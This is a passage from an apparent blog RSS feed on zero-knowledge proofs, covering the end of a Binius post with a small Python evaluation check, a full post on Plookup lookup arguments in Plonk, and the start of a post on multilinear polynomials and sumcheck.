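# arranged in a 4 x 4 matrix T, and p(r) = R_row . T . R_col.
P = 97

def tensor(rs):
    # tensor product of the pairs (1 - r_i, r_i): the Lagrange basis at rs
    out = [1]
    for r in rs:
        out = [x * (1 - r) % P for x in out] + [x * r % P for x in out]
    return out

def mle_eval(t, r):
    # direct evaluation: sum of t_j times the j-th Lagrange basis value
    return sum(tj * bj for tj, bj in zip(t, tensor(r))) % P

t = list(range(16))                     # 16 Lagrange coefficients
r = [5, 11, 2, 7]                       # evaluation point in F_97^4
T = [t[4 * i:4 * i + 4] for i in range(4)]
R_col = tensor(r[:2])                   # first log(m1) components of r
R_row = tensor(r[2:])                   # last log(m0) components of r
RT = [sum(R_row[i] * T[i][j] for i in range(4)) % P for j in range(4)]
s = sum(RT[j] * R_col[j] for j in range(4)) % P
assert s == mle_eval(t, r)              # both evaluations agree
```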
&lt;p&gt;A key concept in building the commitment scheme is that of packing. Given $m$ elements of $\tau_{ k }$, we can group them into $m&#x2F;2^j$ elements of $\tau_{ k + j}$. Similarly, the rows can be packed into elements of $\tau_r$. The polynomial commitment is modified to have the verifier test blocks of columns instead of single columns.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;conclusion&quot;&gt;Conclusion&lt;&#x2F;h2&gt;
&lt;p&gt;In this post, we covered the basic concepts behind Binius. The construction takes advantage of binary fields built using extension towers, which leads to hardware-friendly operations. The construction also lets us concatenate several elements and interpret them as elements of an extension field. The commitment scheme is based on brakedown, which uses Merkle trees and Reed-Solomon encoding. The scheme results in larger proofs and longer verification times than FRI, but the prover’s time is significantly reduced; in most applications, the savings in prover time outweigh the costs of larger proofs and longer verification. Besides, using recursive proofs can further reduce the proof size, or we could use one final SNARK, such as Groth16 or Plonk, to achieve smaller proofs to post to L1. In the following posts, we will look more deeply at the commitment scheme and the different protocols for the SNARK.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>If you don&#x27;t know, look it up or how to create lookup tables for zero knowledge proofs</title>
          <pubDate>Thu, 02 Nov 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/lookups/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/lookups/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/lookups/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;ZK-SNARKs (zero-knowledge succinct, non-interactive arguments of knowledge) and STARKs (scalable transparent arguments of knowledge) are powerful cryptographic constructions with applications in decentralized private computing and blockchain scaling. They allow one party, the prover, to show a second party, the verifier, that he carried out a computation correctly, in a way that is both memory and time-efficient. In other words, the prover can submit a short proof (more concise than sending all the values involved in the calculation), which can be verified in less time than we would need for the independent re-execution of the computation. These constructions rely on encoding the information as polynomials, committing to them (via a polynomial commitment scheme, such as FRI or KZG), and showing that certain relationships hold between polynomials. For an introduction to these concepts, see our previous posts on &lt;a href=&quot;&#x2F;diving-deep-fri&#x2F;&quot;&gt;STARKs&lt;&#x2F;a&gt;, &lt;a href=&quot;&#x2F;all-you-wanted-to-know-about-plonk&#x2F;&quot;&gt;Plonk&lt;&#x2F;a&gt;, &lt;a href=&quot;&#x2F;groth16&#x2F;&quot;&gt;Groth 16&lt;&#x2F;a&gt; or the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;zkhack.dev&#x2F;whiteboard&#x2F;&quot;&gt;introductory videos by Dan Boneh&lt;&#x2F;a&gt; at zkhack.&lt;&#x2F;p&gt;
&lt;p&gt;The first step is transforming code into a system of polynomial equations over a finite field. This is known as arithmetization, and typical arithmetization schemes are R1CS (rank one constraint system), Plonkish, and AIR (algebraic intermediate representation). Some operations are expensive to arithmetize, which can lead to significant costs for the prover. Lookup arguments are a powerful technique that helps us solve this problem by having a precomputed table of values (it can also be dynamic). In this blog post, we will cover the basics of lookup arguments and describe the PlookUp scheme. The topic has been discussed in the ongoing &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;sparkling_water_bootcamp&#x2F;blob&#x2F;main&#x2F;README.md&quot;&gt;Sparkling Water Bootcamp&lt;&#x2F;a&gt;, where we will provide an implementation of the different lookups in our library, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&quot;&gt;Lambdaworks&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;examples-and-working-principle&quot;&gt;Examples and working principle&lt;&#x2F;h2&gt;
&lt;p&gt;Suppose we want to check that a variable $a$ has to be in a prescribed range, such as a &lt;code&gt;u8&lt;&#x2F;code&gt;. One simple yet inefficient way to do so is to express $a$ in its binary form $a_0 a_1 a_2 a_3 a_4 a_5 a_6 a_7$ and check that:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Every variable is boolean $a_i (1 - a_i ) = 0$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. $a = \sum a_k 2^k$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
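For concreteness, the two constraint families above can be checked directly; this is a plain-integer sketch of our own (in a real proof system these are equations over a field):

```python
def u8_range_check(a, bits):
    """Check the range-check constraints for a u8: each bit is boolean,
    and the bits recompose to a."""
    booleans = all(b * (1 - b) == 0 for b in bits)              # a_i (1 - a_i) = 0
    recompose = a == sum(b * 2**k for k, b in enumerate(bits))  # a = sum a_k 2^k
    return booleans and recompose

a = 173
bits = [(a >> k) & 1 for k in range(8)]   # 8 auxiliary bit witnesses
assert u8_range_check(a, bits)            # 9 constraints in total
assert not u8_range_check(300, bits)      # 300 cannot satisfy them with these bits
```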
&lt;p&gt;This approach makes us add several additional constraints, which scale proportionally with the number of bits. Another approach could be showing that the number is contained in the list of all valid values for the variable. This is an example of a lookup operation. The first lookup arguments depended on the table size (we paid the price both for the lookup operations we did and for the whole table). At the same time, newer constructions make us pay the price only for the number of lookup operations (plus some preprocessing). If we have to do just a few lookup operations, then using these arguments does not pay off (we could accept having more constraints). Still, as the number or complexity of the operations increases, it makes sense to support lookups.&lt;&#x2F;p&gt;
&lt;p&gt;We can prove bitwise operations using lookup tables. For example, for the exclusive or between two bytes $a$ and $b$, $c = a \oplus b$, we can use the arithmetic constraints to represent the operations,&lt;br &#x2F;&gt;
$a_i (1 - a_i ) = 0$&lt;br &#x2F;&gt;
$b_i (1 - b_i ) = 0$&lt;br &#x2F;&gt;
$a_i + b_i - 2a_i b_i - c_i = 0$&lt;br &#x2F;&gt;
We could also have a list with all possible combinations of $a$, $b$, and $c$. Given that each byte takes 256 different values ($2^8$), we could have a table listing all valid input&#x2F;output trios ($2^{ 16 } = 65536$) and check that our $(a , b, c)$ are in that list.&lt;&#x2F;p&gt;
&lt;p&gt;To prove inclusion, we will use tricks similar to those we applied for the &lt;a href=&quot;&#x2F;all-you-wanted-to-know-about-plonk&#x2F;&quot;&gt;permutation arguments&lt;&#x2F;a&gt;. We will first reduce the claim of our tuple $(a , b , c)$ being in table $\mathcal{T}$ to a relationship between two vectors. We will show that, for every component in the vector $f$, there exists some component in the vector $t$ such that $f_i = t_k$. We can zip the table into a single vector by performing a random folding of the columns,&lt;br &#x2F;&gt;
$t = col_0 (\mathcal{T}) + \zeta col_1 (\mathcal{T}) + \zeta^2 col_2 (\mathcal{T})$&lt;br &#x2F;&gt;
We can reduce our tuple $(a, b , c)$ to the vector $f$ by doing the same operation,&lt;br &#x2F;&gt;
$f = a +\zeta b + \zeta^2 c$&lt;&#x2F;p&gt;
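A small numeric sketch of this folding for the XOR table (the 61-bit Mersenne prime and the way $\zeta$ is sampled are illustrative choices, not fixed by the post):

```python
import random

P = (1 << 61) - 1              # an illustrative prime field modulus
zeta = random.randrange(1, P)  # the folding challenge

# the table of all valid (a, b, a xor b) trios, zipped into one vector t
table = [(a, b, a ^ b) for a in range(256) for b in range(256)]
t = [(a + zeta * b + zeta * zeta * c) % P for a, b, c in table]

# a claimed trio folds the same way; if c = a xor b, then f lands in t
a, b = 0xA5, 0x3C
f = (a + zeta * b + zeta * zeta * (a ^ b)) % P
assert f in set(t)
```

A wrong claim, such as $c = a \vee b$, would fold to a value outside $t$ except with negligible probability over the choice of $\zeta$.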
&lt;p&gt;To be able to apply a kind of permutation argument, we should know the number of times every element in $f$ appears in $t$, which can be problematic. Instead, we can work with randomized differences over sorted vectors. This method was introduced in the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2020&#x2F;315.pdf&quot;&gt;PlookUp paper&lt;&#x2F;a&gt;. We build a vector $s$, which results from concatenating the vectors $f$ and $t$ and sorting the result by the order the values appear in $t$. If the set of non-zero consecutive differences in $s$ is the same as the set of consecutive differences in $t$, then this proves that $f$ has all its values in the set given by $t$. If a value of $t$ appears more than once in $f$, the consecutive differences will yield $0$ for equal elements, thus eliminating them from the checks. The randomized differences avoid having to check the initial values,&lt;br &#x2F;&gt;
$\Delta s_i = s_i + \beta’ s_{i + 1}$&lt;br &#x2F;&gt;
$\Delta t_i = t_i + \beta’ t_{i + 1}$&lt;br &#x2F;&gt;
In the case of randomized differences, even if the consecutive elements are the same, the difference will be non-zero. However, we know that the differences will be multiples of $1 + \beta’$, which allows us to identify them. The check involves two bivariate polynomials, $F$ and $G$,&lt;br &#x2F;&gt;
$F = (1 + \beta’)^n \prod (\gamma’ + f_j) \prod (\gamma’ (1 + \beta’ ) + \Delta t_i )$&lt;br &#x2F;&gt;
$G = \prod (\gamma’ (1 + \beta’ ) + \Delta s_i )$&lt;br &#x2F;&gt;
If these two polynomials are the same, we have proven that all the values of $f$ are contained in the set given by $t$.&lt;br &#x2F;&gt;
As in the permutation check, it is useful to define the vector $z$, defined by:&lt;br &#x2F;&gt;
$$z_0 = 1$$&lt;br &#x2F;&gt;
$$z_i = \prod \frac{(1 + \beta’)(\gamma’ + f_i )(\gamma’(1 + \beta’) + \Delta t_i )}{(\gamma’ (1 + \beta’ ) + s_{2i - 1} + \beta’ s_{2i } )(\gamma’ (1 + \beta’ ) + s_{2i} + \beta’ s_{2i + 1} )}$$&lt;br &#x2F;&gt;
We can then interpolate the values of $z$ to obtain the polynomial $z (x)$ which must satisfy the conditions:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. $z (x = 1) = 1$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. $z (x = g^N ) = 1$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. $z(x) U(x) - z(gx) V(x) = 0$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;where the polynomials $U(x)$ and $V(x)$ result from the interpolation of the polynomials $F$ and $G$, respectively. These constraints must be added to the constraints of the proof system we are using.&lt;&#x2F;p&gt;
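The product identity between $F$ and $G$ can be verified numerically on a toy table (the values, the prime, and the challenge sampling below are illustrative choices of ours):

```python
import random

# Toy Plookup product check: table t, lookups f (every value of f is in
# t), and s = (f, t) sorted by the order of t; beta and gamma stand in
# for the challenges beta' and gamma' of the text.
P = (1 << 61) - 1
beta = random.randrange(1, P)
gamma = random.randrange(1, P)

t = [1, 4, 9, 16, 25]
f = [4, 4, 25, 1]
order = {v: i for i, v in enumerate(t)}
s = sorted(f + t, key=lambda v: order[v])

def F_product():
    # (1 + beta)^n * prod(gamma + f_j) * prod(gamma(1 + beta) + t_i + beta t_{i+1})
    res = pow(1 + beta, len(f), P)
    for fj in f:
        res = res * (gamma + fj) % P
    for ti, tn in zip(t, t[1:]):
        res = res * (gamma * (1 + beta) + ti + beta * tn) % P
    return res

def G_product():
    # prod over consecutive pairs of s of (gamma(1 + beta) + s_i + beta s_{i+1})
    res = 1
    for si, sn in zip(s, s[1:]):
        res = res * (gamma * (1 + beta) + si + beta * sn) % P
    return res

assert F_product() == G_product()
```

When $f$ is contained in $t$ and $s$ is sorted correctly, the equality holds for every choice of the challenges, since equal-element differences contribute $(1 + \beta)(\gamma + v)$ factors and the table differences appear exactly once on each side.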
&lt;h2 id=&quot;plonk-and-lookup-tables&quot;&gt;Plonk and Lookup tables&lt;&#x2F;h2&gt;
&lt;p&gt;For a recap of the Plonk protocol, we recommend reading our &lt;a href=&quot;&#x2F;all-you-wanted-to-know-about-plonk&#x2F;&quot;&gt;previous post&lt;&#x2F;a&gt; or the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;tree&#x2F;main&#x2F;docs&#x2F;src&#x2F;plonk&quot;&gt;Lambdaworks docs&lt;&#x2F;a&gt;. Plonk’s arithmetization uses selector variables $q_l , q_r , q_m , q_o , q_c$ to describe the different types of gates, which for a valid execution $(a , b , c)$ should satisfy the following equation:&lt;br &#x2F;&gt;
$q_l (x) a(x) + q_r (x) b(x) + q_m (x) a(x) b(x) + q_o (x) c(x) + q_c (x) + pi(x) = 0$&lt;br &#x2F;&gt;
When introducing lookups into Plonk, we add a new selector variable, $q_{lu}$. This variable will equal $1$ when the values of $(a, b, c)$ must be checked to belong to a given table. The other selectors will be zero in that case, which will trivially satisfy the equations for the other types of gates. We recommend following the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2022&#x2F;086.pdf&quot;&gt;PlonkUp paper&lt;&#x2F;a&gt; for further details.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;setup-and-preprocessed-input&quot;&gt;Setup and preprocessed input&lt;&#x2F;h3&gt;
&lt;p&gt;In Plonk we start with the common preprocessed input, which consists of the selector polynomials, $q_l(x) , q_r (x), q_m (x), q_o (x) , q_c (x)$, plus the copy constraint polynomials $S_{\sigma 1} (x) , S_{\sigma 2} (x) , S_{\sigma 3} (x)$. In the case of lookups, we have more preprocessed information, such as $q_{lu} (x)$ and $col_0 (\mathcal{T}) (x) , col_1 (\mathcal{T}) (x) , col_2 (\mathcal{T}) (x)$.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;round-1-committing-to-an-execution-of-the-circuit&quot;&gt;Round 1 - Committing to an execution of the circuit&lt;&#x2F;h3&gt;
&lt;p&gt;Round 1 in the Plonk protocol consists of interpolating the column polynomials $a(x)$, $b(x)$, and $c(x)$ and committing to them. This way, the prover commits to a given execution of the circuit, and he won’t be able to change the values of the execution trace.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;round-2-enter-lookups&quot;&gt;Round 2 - Enter Lookups&lt;&#x2F;h3&gt;
&lt;p&gt;When we have lookups, we add a new round. We will call it Round 2. Here, the prover will zip the table into a vector and start all the work to prove the lookup arguments. The prover samples the folding coefficient $\zeta$ for the table and wirings and obtains the compressed table and queries,&lt;br &#x2F;&gt;
$t = col_0 (\mathcal{T}) + \zeta col_1 (\mathcal{T}) + \zeta^2 col_2 (\mathcal{T})$&lt;br &#x2F;&gt;
$f^\prime = a +\zeta b + \zeta^2 c$&lt;br &#x2F;&gt;
This last polynomial needs blindings to make it zero-knowledge, following the same recipe from Round 1:&lt;br &#x2F;&gt;
$f(x) = f^\prime (x) + Z_H (x) (b_7 + b_8x)$&lt;br &#x2F;&gt;
After that, the prover builds the vector $s$, sorted by $t$. Since this vector’s length is greater than the size of the domain $H$ over which we interpolated $t$ and $f$, we break it down into two parts, $h_1$ and $h_2$, and we create the polynomials $h_1 (x)$ and $h_2 (x)$. Two common approaches exist for breaking the polynomial: take the first half and interpolate and then the second half or split into odd and even terms. The second approach needs one check less, so we will adopt that strategy here, following &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2022&#x2F;086.pdf&quot;&gt;PlonkUp&lt;&#x2F;a&gt;. Since the polynomials $h_1 (x)$ and $h_2 (x)$ contain information about the witness, we also add blindings to these polynomials.&lt;&#x2F;p&gt;
&lt;p&gt;The round ends with the commitment of the query polynomial, $f(x)$, and the parts of the sorted vector, $h_1 (x)$ and $h_2 (x)$.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;round-3-computing-the-permutation-and-plookup-polynomials&quot;&gt;Round 3 - Computing the permutation and Plookup polynomials&lt;&#x2F;h3&gt;
&lt;p&gt;Round 3 involves the calculation of the copy constraint polynomial, $z_1 (x)$, and the Plookup polynomial, $z_2 (x)$. The permutation argument polynomial, $z_1 (x)$ is given by the following three terms:&lt;br &#x2F;&gt;
$$z_{11} = (b_{14} x^2 + b_{15} x + b_{16} ) Z_H (x)$$&lt;br &#x2F;&gt;
$$z_{12} = L_{1} (x)$$&lt;br &#x2F;&gt;
$$z_{13} = \sum L_{i + 1} (x) \prod \frac{(\gamma + \beta \omega^i + a_i )(\gamma + k_1 \beta\omega^i + b_i )(\gamma + k_2 \beta\omega^i + c_i )}{(\gamma + \beta S_{\sigma 1,i} + a_i )(\gamma + k_1 \beta S_{\sigma 2, i} + b_i )(\gamma + k_2 \beta S_{\sigma 3,i} + c_i )}$$&lt;br &#x2F;&gt;
The first term corresponds to the blinding polynomial, the second is the first Lagrange basis polynomial (it is one if $x = g$ and zero elsewhere), and the third one contains the grand product.&lt;&#x2F;p&gt;
&lt;p&gt;The Plookup polynomial $z_2 (x)$ looks very similar, given by three terms,&lt;br &#x2F;&gt;
$$z_{21} = (b_{17} x^2 + b_{18} x + b_{19} ) Z_H (x)$$&lt;br &#x2F;&gt;
$$z_{22} = L_{1} (x)$$&lt;br &#x2F;&gt;
$$z_{23} = \sum L_{i + 1} (x) \prod \frac{( 1 + \beta’ )( \gamma’ + f_i )(\gamma’(1 + \beta’) + t_i + \beta’ t_{i + 1} )}{(\gamma’ (1 + \beta’ ) + s_{2i - 1} + \beta’ s_{ 2i } )(\gamma’ (1 + \beta’ ) + s_{2i} + \beta’ s_{2i + 1} )}$$&lt;&#x2F;p&gt;
&lt;p&gt;These polynomials are best calculated by obtaining the components for the grand product check (in evaluation form) and then interpolating using the fast Fourier transform. The prover commits to these two polynomials.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;round-4-transforming-into-quotients&quot;&gt;Round 4 - Transforming into Quotients&lt;&#x2F;h3&gt;
&lt;p&gt;Round 4 computes the linear combination of the constraint polynomial, the copy constraint polynomial, and the Plookup constraints. We have the following constraints:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. All the assignments have to satisfy the general gates equations.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. The permutation check polynomial $z_1 (x)$ should equal one at the first evaluation point. Using the machinery we learned in STARKs, we could translate the condition as  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;$$\frac{z_1 (x) - 1}{x - g^1}$$&lt;br &#x2F;&gt;
should be a polynomial. We can transform it into a more suitable form (so that all the constraints have the same vanishing polynomial)&lt;br &#x2F;&gt;
$$L_1 (x) (z_1 (x) - 1)$$
3. The permutation argument’s constraints&lt;br &#x2F;&gt;
$$\begin{align}&lt;br &#x2F;&gt;
(\gamma + \beta x + a (x) )(\gamma + k_1 \beta x + b (x) )(\gamma + k_2 \beta (x) + c (x) )z_1 (x) &amp;amp;- \newline&lt;br &#x2F;&gt;
(\gamma + \beta S_{\sigma 1} (x) + a (x) )(\gamma + k_1 \beta S_{\sigma 2} (x) + b (x) )(\gamma + k_2 \beta S_{\sigma 3} (x) + c (x) )z_1 (g x)&lt;br &#x2F;&gt;
\end{align}$$
4. Enforcing the lookup gates,&lt;br &#x2F;&gt;
$q_{lu} (x) ( a(x) + \zeta b(x) + \zeta^2 c(x) - f (x) )$
5. The product check for the Plookup polynomial&lt;br &#x2F;&gt;
$$\begin{align}&lt;br &#x2F;&gt;
(1 + \beta’)(\gamma’ + f(x) )(\gamma’(1 + \beta’) + t(x) + \beta’ t(g x)) z_2 (x) &amp;amp;- \newline&lt;br &#x2F;&gt;
(\gamma’ (1 + \beta’ ) + h_{1} (x) + \beta’ h_{2} (x) )(\gamma’ (1 + \beta’ ) + h_{2} (x) + \beta’ h_1 (gx) )z_2 (g x)&lt;br &#x2F;&gt;
\end{align}$$
6. The Plookup polynomial should be equal to one at the first point,&lt;br &#x2F;&gt;
$L_1 (x) (z_2 (x) - 1)$&lt;&#x2F;p&gt;
&lt;p&gt;All the constraints should hold over the interpolation domain. Each polynomial is then divisible by $Z_H (x)$, and so is the random linear combination of the polynomials. The result is the quotient polynomial, $q (x)$, which is split into three parts, each of degree at most $N + 1$&lt;br &#x2F;&gt;
$q (x) = q_{lo} (x) + x^{N + 2} q_{mid} (x) + x^{2N + 4} q_{hi} (x)$&lt;&#x2F;p&gt;
&lt;p&gt;The prover commits to each of the parts.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;round-5-evaluations&quot;&gt;Round 5 - Evaluations&lt;&#x2F;h3&gt;
&lt;p&gt;Round 5 computes the evaluations of several polynomials at a random point $z$ and sends them to the verifier so that he has enough information to check the relationship between the quotient and the original polynomials. The prover samples $z$ from the transcript and computes:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $a(z)$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $b(z)$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $c(z)$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $S_{\sigma 1} (z)$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $S_{\sigma 2} (z)$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $f(z)$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $t(z)$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $t (gz)$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $z_1 (gz)$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $z_2 (gz)$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $h_1 (gz)$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $h_2 (z)$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;round-6-wrapping-the-proof&quot;&gt;Round 6 - Wrapping the proof&lt;&#x2F;h3&gt;
&lt;p&gt;Round 6 performs the linearizations and generates the opening proof. So far, the prover has given commitments to polynomials and their evaluations at some point. It’s time to link both and produce the evaluation proof. First, the prover computes the linearization polynomial, $r (x)$, which should equal $0$ at $z$. The prover computes the proof for the evaluation of all the polynomials listed in round 5 at $z$,&lt;br &#x2F;&gt;
$$W_z (x) = \frac{1}{x - z}(r(x) + \sum \alpha^i (p_i(x) - p_i (z)))$$&lt;br &#x2F;&gt;
He does the same for the polynomials at $gz$,&lt;br &#x2F;&gt;
$$W_{gz} (x) = \frac{1}{x - gz}(\sum \alpha^i (p_i(x) - p_i (gz)))$$&lt;&#x2F;p&gt;
&lt;p&gt;The prover commits to these quotient polynomials.&lt;&#x2F;p&gt;
&lt;p&gt;The proof consists of all the evaluations from Round 5, plus the commitments to all the polynomials from Rounds 1, 2, 3, 4, and 6.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;conclusion&quot;&gt;Conclusion&lt;&#x2F;h2&gt;
&lt;p&gt;In this post, we covered the basics of lookup arguments, which let us prove that specific calculations are correct by checking their results in a table that contains all valid input&#x2F;output relations. These techniques can result in significant savings when we try to prove operations that are difficult or expensive to arithmetize, such as range checks or bitwise operations (which can be used extensively). We described the working principles of Plookup, which was among the first arguments to be presented. It can be integrated very neatly into the Plonk protocol, but it carries an extra cost, since the calculation time increases with the table size. Recent constructions reduce the cost associated with the size of the table, paying just a price proportional to the number of lookups. In upcoming posts, we will cover how to code the Plookup protocol and newer lookup arguments.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Have you checked your sums?</title>
          <pubDate>Thu, 26 Oct 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/have-you-checked-your-sums/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/have-you-checked-your-sums/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/have-you-checked-your-sums/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;There has recently been a growing interest in zk-SNARKs (zero-knowledge, succinct, non-interactive arguments of knowledge) due to their capabilities in decentralized private computations and scaling blockchains. These constructions involve a protocol between two parties, a prover and a verifier, where the former attempts to convince the latter of the validity of a given statement. Sometimes, the prover tries to do this without revealing sensitive information. We want the work needed for the verifier to check the statement to be significantly smaller than just doing it himself. For example, we would like to delegate an expensive computation to an untrusted server (for which we do not have the necessary resources) and be able to verify the correctness of the computation using a smartphone. The zero-knowledge property allows us to prove the possession of some secret (such as a private key or the preimage of some hash) without giving that information to the verifier. At the heart of these constructions, we have polynomials and can reduce the statement to some relation between polynomials. For example, &lt;a href=&quot;&#x2F;lambdaworks-or-how-we-decided-to-created-our-zksnarks-library-and-a-stark-prover&#x2F;&quot;&gt;STARKs&lt;&#x2F;a&gt; use univariate polynomials and the FRI protocol to prove the correctness of a given computation. The sumcheck protocol, which involves polynomials in several variables, can be used to build SNARKs.&lt;&#x2F;p&gt;
&lt;p&gt;In this post, we will first describe how to encode vectors as multilinear polynomials (similar to how we encoded vectors as univariate polynomials) and how the sumcheck protocol works. We are currently implementing the sumcheck protocol and multilinear polynomials as part of the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;sparkling_water_bootcamp&#x2F;tree&#x2F;main&quot;&gt;learning path of the Sparkling Water Bootcamp&lt;&#x2F;a&gt;; you can follow the development at &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&quot;&gt;Lambdaworks&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;encoding-vectors-as-multilinear-polynomials&quot;&gt;Encoding vectors as multilinear polynomials&lt;&#x2F;h2&gt;
&lt;p&gt;A polynomial $p$ in $m$ variables is called multilinear if the degree of each variable $x_i$ is at most one in every term. For example, $p_1 (x_1 , x_2 , x_3 , x_4 ) = x_1 + 2 x_2 + x_1 x_2 x_4 x_3$ is a multilinear polynomial because the power of each $x_i$ is either $0$ or $1$ in each term. The polynomial $p_2 (x_1 , x_2 ) = x_1 x_2^2$ is not, since the degree of $x_2$ is $2$. The total degree of a multilinear polynomial is the highest sum of all the powers of a term (monomial). For $p_1$, this is 4. In general, the total degree of a multilinear polynomial in $m$ variables is at most $m$.&lt;&#x2F;p&gt;
&lt;p&gt;We will restrict ourselves now to polynomials defined over the set $D = \{ 0 , 1 \}^m$. Given a function $f$ defined over $D$, we can define a multilinear polynomial $p(x_1, x_2, … , x_m )$ such that $p$ coincides with $f$ over the set $D$, that is $p(x) = f (x)$ for every $x \in D$. Since this polynomial is unique, the polynomial $p$ is called the multilinear extension of $f$.&lt;&#x2F;p&gt;
&lt;p&gt;We can use the multilinear extension to represent a vector $v$ containing $2^m$ elements. Suppose the elements of the vector $v$ belong to some finite field $\mathbb{F}$. We first create the function $f: D \rightarrow \mathbb{F}$, which maps each element of $D$ into an element of $v$. One easy way to do this is by representing the position $k$ in the vector in its bit form. For example, if the vector has 256 elements, we need $8$ variables (bits), and we can define the map as:&lt;br &#x2F;&gt;
$f(0, 0, 0, 0, 0, 0, 0, 0) = v_0$&lt;br &#x2F;&gt;
$f(0, 0, 0, 0, 0, 0, 0, 1) = v_1$&lt;br &#x2F;&gt;
